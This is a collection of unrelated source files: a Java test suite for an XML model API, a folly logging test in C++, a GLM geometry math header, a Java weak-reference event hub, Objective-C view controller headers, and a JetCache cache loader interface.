modelInstance.getModelElementById("birdo"); plucky = modelInstance.getModelElementById("plucky"); fiffy = modelInstance.getModelElementById("fiffy"); timmy = modelInstance.getModelElementById("timmy"); daisy = modelInstance.getModelElementById("daisy"); hedwigRelationship = modelInstance.getModelElementById("tweety-hedwig"); birdoRelationship = modelInstance.getModelElementById("tweety-birdo"); pluckyRelationship = modelInstance.getModelElementById("tweety-plucky"); fiffyRelationship = modelInstance.getModelElementById("tweety-fiffy"); timmyRelationship = createRelationshipDefinition(modelInstance, timmy, FriendRelationshipDefinition.class); daisyRelationship = createRelationshipDefinition(modelInstance, daisy, ChildRelationshipDefinition.class); } @Test public void testSetIdAttributeByHelper() { String newId = "new-" + tweety.getId(); tweety.setId(newId); assertThat(tweety.getId()).isEqualTo(newId); } @Test public void testSetIdAttributeByAttributeName() { tweety.setAttributeValue("id", "duffy", true); assertThat(tweety.getId()).isEqualTo("duffy"); } @Test public void testRemoveIdAttribute() { tweety.removeAttribute("id"); assertThat(tweety.getId()).isNull(); } @Test public void testSetNameAttributeByHelper() { tweety.setName("tweety"); assertThat(tweety.getName()).isEqualTo("tweety"); } @Test public void testSetNameAttributeByAttributeName() { tweety.setAttributeValue("name", "daisy"); assertThat(tweety.getName()).isEqualTo("daisy"); } @Test public void testRemoveNameAttribute() { tweety.removeAttribute("name"); assertThat(tweety.getName()).isNull(); } @Test public void testSetFatherAttributeByHelper() { tweety.setFather(timmy); assertThat(tweety.getFather()).isEqualTo(timmy); } @Test public void testSetFatherAttributeByAttributeName() { tweety.setAttributeValue("father", timmy.getId()); assertThat(tweety.getFather()).isEqualTo(timmy); } @Test public void testSetFatherAttributeByAttributeNameWithNamespace() { tweety.setAttributeValue("father", "tns:hedwig"); assertThat(tweety.getFather()).isEqualTo(hedwig); } @Test public void testRemoveFatherAttribute() { tweety.setFather(timmy); assertThat(tweety.getFather()).isEqualTo(timmy); tweety.removeAttribute("father"); assertThat(tweety.getFather()).isNull(); } @Test public void testChangeIdAttributeOfFatherReference() { tweety.setFather(timmy); assertThat(tweety.getFather()).isEqualTo(timmy); timmy.setId("new-" + timmy.getId()); 
assertThat(tweety.getFather()).isEqualTo(timmy); } @Test public void testReplaceFatherReferenceWithNewAnimal() { tweety.setFather(timmy); assertThat(tweety.getFather()).isEqualTo(timmy); timmy.replaceWithElement(plucky); assertThat(tweety.getFather()).isEqualTo(plucky); } @Test public void testSetMotherAttributeByHelper() { tweety.setMother(daisy); assertThat(tweety.getMother()).isEqualTo(daisy); } @Test public void testSetMotherAttributeByAttributeName() { tweety.setAttributeValue("mother", fiffy.getId()); assertThat(tweety.getMother()).isEqualTo(fiffy); } @Test public void testRemoveMotherAttribute() { tweety.setMother(daisy); assertThat(tweety.getMother()).isEqualTo(daisy); tweety.removeAttribute("mother"); assertThat(tweety.getMother()).isNull(); } @Test public void testReplaceMotherReferenceWithNewAnimal() { tweety.setMother(daisy); assertThat(tweety.getMother()).isEqualTo(daisy); daisy.replaceWithElement(birdo); assertThat(tweety.getMother()).isEqualTo(birdo); } @Test public void testChangeIdAttributeOfMotherReference() { tweety.setMother(daisy); assertThat(tweety.getMother()).isEqualTo(daisy); daisy.setId("new-" + daisy.getId()); assertThat(tweety.getMother()).isEqualTo(daisy); } @Test public void testSetIsEndangeredAttributeByHelper() { tweety.setIsEndangered(true); assertThat(tweety.isEndangered()).isTrue(); } @Test public void testSetIsEndangeredAttributeByAttributeName() { tweety.setAttributeValue("isEndangered", "false"); assertThat(tweety.isEndangered()).isFalse(); } @Test public void testRemoveIsEndangeredAttribute() { tweety.removeAttribute("isEndangered"); // default value of isEndangered: false assertThat(tweety.isEndangered()).isFalse(); } @Test public void testSetGenderAttributeByHelper() { tweety.setGender(Gender.Male); assertThat(tweety.getGender()).isEqualTo(Gender.Male); } @Test public void testSetGenderAttributeByAttributeName() { tweety.setAttributeValue("gender", Gender.Unknown.toString()); assertThat(tweety.getGender()).isEqualTo(Gender.Unknown); } @Test public void testRemoveGenderAttribute() { tweety.removeAttribute("gender"); assertThat(tweety.getGender()).isNull(); // gender is required, so the model is invalid without try { validateModel(); fail("The model is invalid cause the gender of an animal is a required attribute."); } catch (Exception e) { assertThat(e).isInstanceOf(ModelValidationException.class); } // add gender to make model valid tweety.setGender(Gender.Female); } @Test public void testSetAgeAttributeByHelper() { tweety.setAge(13); assertThat(tweety.getAge()).isEqualTo(13); } @Test public void testSetAgeAttributeByAttributeName() { tweety.setAttributeValue("age", "23"); assertThat(tweety.getAge()).isEqualTo(23); } @Test public void testRemoveAgeAttribute() { tweety.removeAttribute("age"); assertThat(tweety.getAge()).isNull(); } @Test public void testAddRelationshipDefinitionsByHelper() { assertThat(tweety.getRelationshipDefinitions()) .isNotEmpty() .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); tweety.getRelationshipDefinitions().add(timmyRelationship); tweety.getRelationshipDefinitions().add(daisyRelationship); assertThat(tweety.getRelationshipDefinitions()) .hasSize(6) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionsByIdByHelper() { hedwigRelationship.setId("new-" + hedwigRelationship.getId()); pluckyRelationship.setId("new-" + 
pluckyRelationship.getId()); assertThat(tweety.getRelationshipDefinitions()) .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); } @Test public void testUpdateRelationshipDefinitionsByIdByAttributeName() { birdoRelationship.setAttributeValue("id", "new-" + birdoRelationship.getId(), true); fiffyRelationship.setAttributeValue("id", "new-" + fiffyRelationship.getId(), true); assertThat(tweety.getRelationshipDefinitions()) .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); } @Test public void testUpdateRelationshipDefinitionsByReplaceElements() { hedwigRelationship.replaceWithElement(timmyRelationship); pluckyRelationship.replaceWithElement(daisyRelationship); assertThat(tweety.getRelationshipDefinitions()) .hasSize(4) .containsOnly(birdoRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionsByRemoveElements() { tweety.getRelationshipDefinitions().remove(birdoRelationship); tweety.getRelationshipDefinitions().remove(fiffyRelationship); assertThat(tweety.getRelationshipDefinitions()) .hasSize(2) .containsOnly(hedwigRelationship, pluckyRelationship); } @Test public void testClearRelationshipDefinitions() { tweety.getRelationshipDefinitions().clear(); assertThat(tweety.getRelationshipDefinitions()).isEmpty(); } @Test public void testAddRelationsDefinitionRefsByHelper() { assertThat(tweety.getRelationshipDefinitionRefs()) .isNotEmpty() .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); addRelationshipDefinition(tweety, timmyRelationship); addRelationshipDefinition(tweety, daisyRelationship); tweety.getRelationshipDefinitionRefs().add(timmyRelationship); tweety.getRelationshipDefinitionRefs().add(daisyRelationship); assertThat(tweety.getRelationshipDefinitionRefs()) .isNotEmpty() .hasSize(6) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByIdByHelper() { hedwigRelationship.setId("child-relationship"); pluckyRelationship.setId("friend-relationship"); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByIdByAttributeName() { birdoRelationship.setAttributeValue("id", "birdo-relationship", true); fiffyRelationship.setAttributeValue("id", "fiffy-relationship", true); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByReplaceElements() { hedwigRelationship.replaceWithElement(timmyRelationship); pluckyRelationship.replaceWithElement(daisyRelationship); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(birdoRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByRemoveElements() { tweety.getRelationshipDefinitions().remove(birdoRelationship); tweety.getRelationshipDefinitions().remove(fiffyRelationship); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(2) .containsOnly(hedwigRelationship, pluckyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByRemoveIdAttribute() { 
birdoRelationship.removeAttribute("id"); pluckyRelationship.removeAttribute("id"); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(2) .containsOnly(hedwigRelationship, fiffyRelationship); } @Test public void testClearRelationshipDefinitionsRefs() { tweety.getRelationshipDefinitionRefs().clear(); assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); // should not affect animal relationship definitions assertThat(tweety.getRelationshipDefinitions()).hasSize(4); } @Test public void testClearRelationshipDefinitionRefsByClearRelationshipDefinitions() { assertThat(tweety.getRelationshipDefinitionRefs()).isNotEmpty(); tweety.getRelationshipDefinitions().clear(); assertThat(tweety.getRelationshipDefinitions()).isEmpty(); // should affect animal relationship definition refs assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); } @Test public void testAddRelationshipDefinitionRefElementsByHelper() { assertThat(tweety.getRelationshipDefinitionRefElements()) .isNotEmpty() .hasSize(4); addRelationshipDefinition(tweety, timmyRelationship); RelationshipDefinitionRef timmyRelationshipDefinitionRef = modelInstance.newInstance(RelationshipDefinitionRef.class); timmyRelationshipDefinitionRef.setTextContent(timmyRelationship.getId()); tweety.getRelationshipDefinitionRefElements().add(timmyRelationshipDefinitionRef); addRelationshipDefinition(tweety, daisyRelationship); RelationshipDefinitionRef daisyRelationshipDefinitionRef = modelInstance.newInstance(RelationshipDefinitionRef.class); daisyRelationshipDefinitionRef.setTextContent(daisyRelationship.getId()); tweety.getRelationshipDefinitionRefElements().add(daisyRelationshipDefinitionRef); assertThat(tweety.getRelationshipDefinitionRefElements()) .isNotEmpty() .hasSize(6) .contains(timmyRelationshipDefinitionRef, daisyRelationshipDefinitionRef); } @Test public void testRelationshipDefinitionRefElementsByTextContent() { Collection<RelationshipDefinitionRef> relationshipDefinitionRefElements = tweety.getRelationshipDefinitionRefElements(); Collection<String> textContents = new ArrayList<String>(); for (RelationshipDefinitionRef relationshipDefinitionRef : relationshipDefinitionRefElements) { String textContent = relationshipDefinitionRef.getTextContent(); assertThat(textContent).isNotEmpty(); textContents.add(textContent); } assertThat(textContents) .isNotEmpty() .hasSize(4) .containsOnly(hedwigRelationship.getId(), birdoRelationship.getId(), pluckyRelationship.getId(), fiffyRelationship.getId()); } @Test public void testUpdateRelationshipDefinitionRefElementsByTextContent() { List<RelationshipDefinitionRef> relationshipDefinitionRefs = new ArrayList<RelationshipDefinitionRef>(tweety.getRelationshipDefinitionRefElements()); addRelationshipDefinition(tweety, timmyRelationship); relationshipDefinitionRefs.get(0).setTextContent(timmyRelationship.getId()); addRelationshipDefinition(daisy, daisyRelationship); relationshipDefinitionRefs.get(2).setTextContent(daisyRelationship.getId()); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(birdoRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionRefElementsByTextContentWithNamespace() { List<RelationshipDefinitionRef> relationshipDefinitionRefs = new ArrayList<RelationshipDefinitionRef>(tweety.getRelationshipDefinitionRefElements()); addRelationshipDefinition(tweety, timmyRelationship); relationshipDefinitionRefs.get(0).setTextContent("tns:" + timmyRelationship.getId()); 
addRelationshipDefinition(daisy, daisyRelationship); relationshipDefinitionRefs.get(2).setTextContent("tns:" + daisyRelationship.getId()); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(birdoRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionRefElementsByRemoveElements() { List<RelationshipDefinitionRef> relationshipDefinitionRefs = new ArrayList<RelationshipDefinitionRef>(tweety.getRelationshipDefinitionRefElements()); tweety.getRelationshipDefinitionRefElements().remove(relationshipDefinitionRefs.get(1)); tweety.getRelationshipDefinitionRefElements().remove(relationshipDefinitionRefs.get(3)); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(2) .containsOnly(hedwigRelationship, pluckyRelationship); } @Test public void testClearRelationshipDefinitionRefElements() { tweety.getRelationshipDefinitionRefElements().clear(); assertThat(tweety.getRelationshipDefinitionRefElements()).isEmpty(); assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); // should not affect animal relationship definitions assertThat(tweety.getRelationshipDefinitions()) .isNotEmpty() .hasSize(4); } @Test public void testClearRelationshipDefinitionRefElementsByClearRelationshipDefinitionRefs() { tweety.getRelationshipDefinitionRefs().clear(); assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); assertThat(tweety.getRelationshipDefinitionRefElements()).isEmpty(); // should not affect animal relationship definitions assertThat(tweety.getRelationshipDefinitions()) .isNotEmpty() .hasSize(4); } @Test public void testClearRelationshipDefinitionRefElementsByClearRelationshipDefinitions() { tweety.getRelationshipDefinitions().clear(); assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); assertThat(tweety.getRelationshipDefinitionRefElements()).isEmpty(); // should affect animal relationship definitions assertThat(tweety.getRelationshipDefinitions()).isEmpty(); } @Test public void testGetBestFriends() { Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isNotEmpty() .hasSize(2) .containsOnly(birdo, plucky); } @Test public void testAddBestFriend() { tweety.getBestFriends().add(daisy); Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isNotEmpty() .hasSize(3) .containsOnly(birdo, plucky, daisy); } @Test public void testRemoveBestFriendRef() { tweety.getBestFriends().remove(plucky); Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isNotEmpty() .hasSize(1) .containsOnly(birdo); } @Test public void testClearBestFriendRef() { tweety.getBestFriends().clear(); Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isEmpty(); } @Test public void testClearAndAddBestFriendRef() { tweety.getBestFriends().clear(); Collection<Animal> bestFriends = tweety.getBestFriends(); assertThat(bestFriends) .isEmpty(); bestFriends.add(daisy); assertThat(bestFriends) .hasSize(1) .containsOnly(daisy); } }
/* * Copyright 2017-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <folly/logging/StandardLogHandler.h> #include <folly/Conv.h> #include <folly/logging/LogCategory.h> #include <folly/logging/LogFormatter.h> #include <folly/logging/LogHandlerConfig.h> #include <folly/logging/LogLevel.h> #include <folly/logging/LogMessage.h> #include <folly/logging/LogWriter.h> #include <folly/logging/LoggerDB.h> #include <folly/portability/GTest.h> using namespace folly; using std::make_shared; namespace { class TestLogFormatter : public LogFormatter { public: std::string formatMessage( const LogMessage& message, const LogCategory* handlerCategory) override { return folly::to<std::string>( logLevelToString(message.getLevel()), "::", message.getCategory()->getName(), "::", handlerCategory->getName(), "::", message.getFileName(), "::", message.getLineNumber(), "::", message.getMessage()); } }; class TestLogWriter : public LogWriter { public: void writeMessage(folly::StringPiece buffer, uint32_t /* flags */ = 0) override { messages_.emplace_back(buffer.str()); } void flush() override {} std::vector<std::string>& getMessages() { return messages_; } const std::vector<std::string>& getMessages() const { return messages_; } bool ttyOutput() const override { return false; } private: std::vector<std::string> messages_; }; } // namespace TEST(StandardLogHandler, simple) { auto writer = make_shared<TestLogWriter>(); LogHandlerConfig config{"std_test"}; StandardLogHandler handler(config, make_shared<TestLogFormatter>(), writer); LoggerDB db{LoggerDB::TESTING}; auto logCategory = db.getCategory("log_cat"); auto handlerCategory = db.getCategory("handler_cat"); LogMessage msg{logCategory, LogLevel::DBG8, "src/test.cpp", 1234, "testMethod", std::string{"hello world"}}; handler.handleMessage(msg, handlerCategory); ASSERT_EQ(1, writer->getMessages().size()); EXPECT_EQ( "DBG8::log_cat::handler_cat::src/test.cpp::1234::hello world", writer->getMessages()[0]); } TEST(StandardLogHandler, levelCheck) { auto writer = make_shared<TestLogWriter>(); LogHandlerConfig config{"std_test"}; StandardLogHandler handler(config, make_shared<TestLogFormatter>(), writer); LoggerDB db{LoggerDB::TESTING}; auto logCategory = db.getCategory("log_cat"); auto handlerCategory = db.getCategory("handler_cat"); auto logMsg = [&](LogLevel level, folly::StringPiece message) { LogMessage msg{ logCategory, level, "src/test.cpp", 1234, "testMethod", message}; handler.handleMessage(msg, handlerCategory); }; handler.setLevel(LogLevel::WARN); logMsg(LogLevel::INFO, "info"); logMsg(LogLevel::WARN, "beware"); logMsg(LogLevel::ERR, "whoops"); logMsg(LogLevel::DBG1, "debug stuff"); auto& messages = writer->getMessages(); ASSERT_EQ(2, messages.size()); EXPECT_EQ( "WARN::log_cat::handler_cat::src/test.cpp::1234::beware", messages.at(0)); EXPECT_EQ( "ERR::log_cat::handler_cat::src/test.cpp::1234::whoops", messages.at(1)); messages.clear(); handler.setLevel(LogLevel::DBG2); logMsg(LogLevel::DBG3, "dbg"); logMsg(LogLevel::DBG1, "here"); 
logMsg(LogLevel::DBG2, "and here"); logMsg(LogLevel::ERR, "oh noes"); logMsg(LogLevel::DBG9, "very verbose"); ASSERT_EQ(3, messages.size()); EXPECT_EQ( "DBG1::log_cat::handler_cat::src/test.cpp::1234::here", messages.at(0)); EXPECT_EQ( "DBG2::log_cat::handler_cat::src/test.cpp::1234::and here", messages.at(1)); EXPECT_EQ( "ERR::log_cat::handler_cat::src/test.cpp::1234::oh noes", messages.at(2)); messages.clear(); }
#ifndef GENERATOR_MATH_HPP #define GENERATOR_MATH_HPP #define GENERATOR_USE_GLM #ifdef GENERATOR_USE_GLM #include <limits> #include <stdexcept> #include <core/math/math_includes.h> namespace gml { // Vectors using glm::bvec2; using glm::dvec2; using glm::ivec2; using glm::uvec2; using glm::vec2; using glm::bvec3; using glm::dvec3; using glm::ivec3; using glm::uvec3; using glm::vec3; using glm::bvec4; using glm::dvec4; using glm::ivec4; using glm::uvec4; using glm::vec4; // Matrices using glm::mat2; using glm::mat2x2; using glm::mat2x3; using glm::mat2x4; using glm::mat3; using glm::mat3x2; using glm::mat3x3; using glm::mat3x4; using glm::mat4; using glm::mat4x2; using glm::mat4x3; using glm::mat4x4; using glm::dmat2; using glm::dmat2x2; using glm::dmat2x3; using glm::dmat2x4; using glm::dmat3; using glm::dmat3x2; using glm::dmat3x3; using glm::dmat3x4; using glm::dmat4; using glm::dmat4x2; using glm::dmat4x3; using glm::dmat4x4; // Quaternions using glm::dquat; using glm::quat; // Functions using glm::clamp; using glm::cross; using glm::degrees; using glm::dot; using glm::max; using glm::min; using glm::mix; using glm::normalize; using glm::ortho; using glm::perspective; using glm::radians; using glm::rotate; using glm::translate; // Function substitutes template <typename T> T angle(const glm::tvec2<T>& v1, const glm::tvec2<T>& v2) { using std::acos; using std::numeric_limits; using std::sqrt; const T len = sqrt(dot(v1, v1) * dot(v2, v2)); if(len <= std::numeric_limits<T>::epsilon()) return T{0}; return acos(clamp(dot(v1, v2) / len, T{-1}, T{1})); } template <typename T> T angle(const glm::tvec3<T>& v1, const glm::tvec3<T>& v2) { using std::acos; using std::numeric_limits; using std::sqrt; const T len = sqrt(dot(v1, v1) * dot(v2, v2)); if(len <= std::numeric_limits<T>::epsilon()) return T{0}; return acos(clamp(dot(v1, v2) / len, T{-1}, T{1})); } template <typename T> glm::tvec2<T> cross(const glm::tvec2<T>& v) { return glm::tvec2<T>(-v.y, v.x); } template <typename T> glm::tvec3<T> transform(const glm::tquat<T>& q, const glm::tvec3<T>& v) { const glm::tvec3<T> temp = T{2.0} * cross(glm::tvec3<T>(q.x, q.y, q.z), v); return v + q.w * temp + cross(glm::tvec3<T>(q.x, q.y, q.z), temp); } template <typename T> glm::tquat<T> qrotate(const T& angle, const glm::tvec3<T>& axis) { using std::cos; using std::sin; const T a = angle / T{2.0}; return glm::tquat<T>{cos(a), sin(a) * axis}; } template <typename T> glm::tvec3<T> normal(const glm::tvec3<T>& p1, const glm::tvec3<T>& p2, const glm::tvec3<T>& p3) { return normalize(cross(p2 - p1, p3 - p1)); } template <typename T, typename TI, typename TS> glm::tvec3<T> project(const glm::tvec3<T>& v, const glm::tmat4x4<T>& modelViewProj, const glm::tvec2<TI>& viewportOrigin, const glm::tvec2<TS>& viewportSize) { glm::tvec4<T> in = modelViewProj * glm::tvec4<T>{v, static_cast<T>(1)}; in[0] /= in[3]; in[1] /= in[3]; in[2] /= in[3]; const auto half = static_cast<T>(0.5); in[0] = in[0] * half + half; in[1] = in[1] * half + half; in[2] = in[2] * half + half; in[0] = in[0] * static_cast<T>(viewportSize[0]) + static_cast<T>(viewportOrigin[0]); in[1] = in[1] * static_cast<T>(viewportSize[1]) + static_cast<T>(viewportOrigin[1]); return glm::tvec3<T>{in}; } template <typename T> glm::tmat4x4<T> ortho2D(const T& left, const T& right, const T& bottom, const T& top) { return ortho(left, right, bottom, top, T{-1}, T{1}); } template <typename T> glm::tvec3<T> slerp(const glm::tvec3<T>& v1, const glm::tvec3<T>& v2, const T& a) { using std::sin; const T theta = angle(v1, v2); 
const T sine = sin(theta); return sin((T{1} - a) * theta) / sine * v1 + sin(a * theta) / sine * v2; } template <typename T> glm::tmat4x4<T> rotate(const glm::tvec3<T>& angle) { using std::cos; using std::sin; const T sy = sin(angle[2]); const T cy = cos(angle[2]); const T sp = sin(angle[1]); const T cp = cos(angle[1]); const T sr = sin(angle[0]); const T cr = cos(angle[0]); const T data[16] = {cp * cy, sr * sp * cy + cr * -sy, cr * sp * cy + -sr * -sy, T{0}, cp * sy, sr * sp * sy + cr * cy, cr * sp * sy + -sr * cy, T{0}, -sp, sr * cp, cr * cp, T{0}, T{0}, T{0}, T{0}, T{1}}; return glm::rowMajor4(glm::make_mat4(data)); } template <typename T> glm::tmat3x3<T> rotate(const T& angle) { using std::cos; using std::sin; const T s = sin(angle); const T c = cos(angle); const T data[9] = {c, -s, T{0}, s, c, T{0}, T{0}, T{0}, T{1}}; return glm::rowMajor3(glm::make_mat3(data)); } template <typename T> glm::tvec2<T> transform(const glm::tmat3x3<T>& m, const glm::tvec2<T>& v) { return glm::tvec2<T>(m * glm::tvec3<T>(v, 1.0)); } namespace detail { template <typename VecT, typename T> VecT bezierImpl(const VecT* p, int n, T t1, T t2, int stride = 1) { if(n == 1) return *p; if(n == 2) return t1 * p[0] + t2 * p[stride]; return t1 * bezierImpl(p, n - 1, t1, t2, stride) + t2 * bezierImpl(p + stride, n - 1, t1, t2, stride); } } // detail template <int D, typename T> glm::tvec2<T> bezier(const glm::tvec2<T> (&p)[D], T t) { static_assert(D > 0, "At least one control point needed."); return detail::bezierImpl(&p[0], D, static_cast<T>(1) - t, t); } template <int D, typename T> glm::tvec3<T> bezier(const glm::tvec3<T> (&p)[D], T t) { static_assert(D > 0, "At least one control point needed."); return detail::bezierImpl(&p[0], D, static_cast<T>(1) - t, t); } template <int D0, int D1, typename T> glm::tvec3<T> bezier2(const glm::tvec3<T> (&p)[D1][D0], const glm::tvec2<T>& t) { static_assert(D0 > 0, "At least one control point needed."); static_assert(D1 > 0, "At least one control point needed."); glm::tvec3<T> temp[D1]; for(int i = 0; i < D1; ++i) { temp[i] = bezier(p[i], t[0]); } return bezier(temp, t[1]); } namespace detail { template <int O, int D, typename VecT, typename T> struct bezierDerivativeImpl { static VecT calc(const VecT (&p)[D], T t) { VecT temp[D - 1]; for(int i = 0; i < D - 1; ++i) { temp[i] = static_cast<T>(D - 1) * (p[i + 1] - p[i]); } return bezierDerivativeImpl<O - 1, D - 1, VecT, T>::calc(temp, t); } }; template <int D, typename VecT, typename T> struct bezierDerivativeImpl<0, D, VecT, T> { static VecT calc(const VecT (&p)[D], T t) { return bezier(p, t); } }; template <typename VecT, typename T> struct bezierDerivativeImpl<0, 1, VecT, T> { static VecT calc(const VecT (&p)[1], T t) { return bezier(p, t); } }; template <int O, typename VecT, typename T> struct bezierDerivativeImpl<O, 1, VecT, T> { static VecT calc(const VecT (&)[1], T) { return VecT{static_cast<T>(0)}; } }; } // detail template <int O, int D, typename T> glm::tvec2<T> bezierDerivative(const glm::tvec2<T> (&p)[D], T t) { static_assert(O > 0, "The derivative order must be at least one."); static_assert(D > 0, "At least one control point needed."); return detail::bezierDerivativeImpl<O, D, glm::tvec2<T>, T>::calc(p, t); } template <int O, int D, typename T> glm::tvec3<T> bezierDerivative(const glm::tvec3<T> (&p)[D], T t) { static_assert(O > 0, "The derivative order must be at least one."); static_assert(D > 0, "At least one control point needed."); return detail::bezierDerivativeImpl<O, D, glm::tvec3<T>, T>::calc(p, t); } template 
<int O, int D0, int D1, typename T> glm::tmat2x3<T> bezier2Jacobian(const glm::tvec3<T> (&p)[D1][D0], const glm::tvec2<T>& t) { static_assert(O > 0, "Order of the Jacobian must be at least one."); static_assert(D0 > 0, "At least one control point needed."); static_assert(D1 > 0, "At least one control point needed."); glm::tvec3<T> temp0[D0]; for(int i = 0; i < D0; ++i) { temp0[i] = detail::bezierImpl(&p[0][i], D1, static_cast<T>(1) - t[1], t[1], D0); } glm::tvec3<T> temp1[D1]; for(int i = 0; i < D1; ++i) { temp1[i] = bezier(p[i], t[0]); } return glm::tmat2x3<T>{bezierDerivative<O>(temp0, t[0]), bezierDerivative<O>(temp1, t[1])}; } } #else #include <gml/gml.hpp> #endif #endif
3,921
7,018
package com.tencent.mtt.supportui.utils.struct;

/**
 * Created by leonardgong on 2018/2/9 0009.
 */

import java.lang.ref.WeakReference;
import java.util.ArrayList;
import java.util.Iterator;

/**
 * Event hub that holds its listeners through weak references.
 * @param <T> Event
 */
public final class WeakEventHub<T> {
    private static final String TAG = "WeakEventHub";
    private final ArrayList<WeakReference<T>> mListeners = new ArrayList<WeakReference<T>>();

    /**
     * Register an observer.
     *
     * @param listener the observer
     */
    public void registerListener(T listener) {
        if (listener == null) {
            return;
        }
        synchronized (mListeners) {
            Iterator<WeakReference<T>> iterator = mListeners.iterator();
            while (iterator.hasNext()) {
                WeakReference<T> weak = iterator.next();
                T item = weak.get();
                if (item == null) {
                    iterator.remove(); // the referent was collected, drop the stale entry
                } else if (item == listener) {
                    return;
                }
            }
            mListeners.add(new WeakReference<T>(listener));
        }
    }

    /**
     * Unregister an observer.
     *
     * @param listener the observer to remove
     */
    public void unregisterListener(T listener) {
        synchronized (mListeners) {
            if (listener != null) {
                Iterator<WeakReference<T>> iterator = mListeners.iterator();
                while (iterator.hasNext()) {
                    WeakReference<T> weakReference = iterator.next();
                    if (weakReference != null) {
                        T item = weakReference.get();
                        if (item == null || item == listener) {
                            iterator.remove(); // also drop entries whose referent was collected
                        }
                    }
                }
            }
        }
    }

    /**
     * Get the listeners that should be notified.
     *
     * @return the listeners that are still alive
     */
    public Iterable<T> getNotifyListeners() {
        ArrayList<T> tmp = new ArrayList<T>(mListeners.size());
        synchronized (mListeners) {
            Iterator<WeakReference<T>> iterator = mListeners.iterator();
            while (iterator.hasNext()) {
                WeakReference<T> weakReference = iterator.next();
                if (weakReference != null) {
                    T item = weakReference.get();
                    if (item == null) {
                        iterator.remove(); // the referent was collected, drop the stale entry
                    } else {
                        tmp.add(item);
                    }
                }
            }
        }
        return tmp;
    }

    public int size() {
        return mListeners.size();
    }
}
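A minimal usage sketch for the WeakEventHub above, not part of the original file: the DataListener interface and the demo class are made-up names for illustration. The hub only keeps weak references, so callers must hold a strong reference to any listener they register.

import com.tencent.mtt.supportui.utils.struct.WeakEventHub;

public class WeakEventHubDemo {

    /** Any observer type works, since the hub is generic; this one is illustrative. */
    interface DataListener {
        void onDataChanged(String newValue);
    }

    public static void main(String[] args) {
        WeakEventHub<DataListener> hub = new WeakEventHub<DataListener>();

        // Keep a strong reference: the hub alone will not prevent garbage collection.
        DataListener listener = new DataListener() {
            @Override
            public void onDataChanged(String newValue) {
                System.out.println("changed to " + newValue);
            }
        };
        hub.registerListener(listener);

        // getNotifyListeners() returns only listeners that are still alive
        // and prunes collected entries as a side effect.
        for (DataListener l : hub.getNotifyListeners()) {
            l.onDataChanged("hello");
        }

        hub.unregisterListener(listener);
    }
}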
1,502
333
// // SUPH5_OCViewController.h // SuperProject // // Created by NShunJian on 2018/4/20. // Copyright © 2018年 superMan. All rights reserved. // #import "SUPWebViewController.h" @interface SUPH5_OCViewController : SUPWebViewController @end
87
1,721
<reponame>xl20071926/JPVideoPlayer<filename>JPVideoPlayerDemo/JPVideoPlayerDemo/JPVideoPlayerCollectionViewController.h // // JPVideoPlayerCollectionViewController.h // ComponentDemo // // Created by Xuzixiang on 2018/6/4. // Copyright © 2018年 frankxzx. All rights reserved. // #import <UIKit/UIKit.h> @interface JPVideoPlayerCollectionViewController : UIViewController @end
125
3,434
<gh_stars>1000+ package com.alicp.jetcache; import java.util.HashMap; import java.util.Map; import java.util.Set; import java.util.function.Function; /** * Created on 2017/5/27. * * @author <a href="mailto:<EMAIL>">huangli</a> */ @FunctionalInterface public interface CacheLoader<K, V> extends Function<K ,V> { V load(K key) throws Throwable; default Map<K, V> loadAll(Set<K> keys) throws Throwable { Map<K, V> map = new HashMap<>(); for (K k : keys) { V value = load(k); if (value != null) { map.put(k, value); } } return map; } @Override default V apply(K key) { try { return load(key); } catch (Throwable e){ throw new CacheInvokeException(e.getMessage(), e); } } default boolean vetoCacheUpdate() { return false; } }
